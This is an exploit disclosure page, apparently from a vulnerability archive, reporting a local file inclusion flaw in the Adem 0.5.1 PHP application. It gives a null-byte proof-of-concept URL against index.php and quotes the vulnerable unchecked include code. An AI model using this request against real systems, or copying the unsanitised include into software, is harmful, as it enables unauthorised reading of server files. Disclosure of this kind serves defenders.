Adem 0.5.1 Local File Inclusion

2014.04.29

Credit: JIKO

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-98

----------[exploit Debut]
[Local File Include Vulnerability]
----------[Script Info]
  
Author        : JIKO
  
----------[Script Info]
  
Site        : https://github.com/4FSB/Adem && http://adem.faares.com/demo
Version     : 0.5.1
Download    : https://codeload.github.com/4FSB/Adem/zip/master
  
----------[exploit Info]
  
Exploit :
http://Path/index.php?p=File%00
 
Line : 8-10
Page : index.php
Code :
     if(is_file($file) && file_exists($file)){
            include $file;
        
 
 }
----------[exploit Fin]

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Adem 0.5.1 Local File Inclusion

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.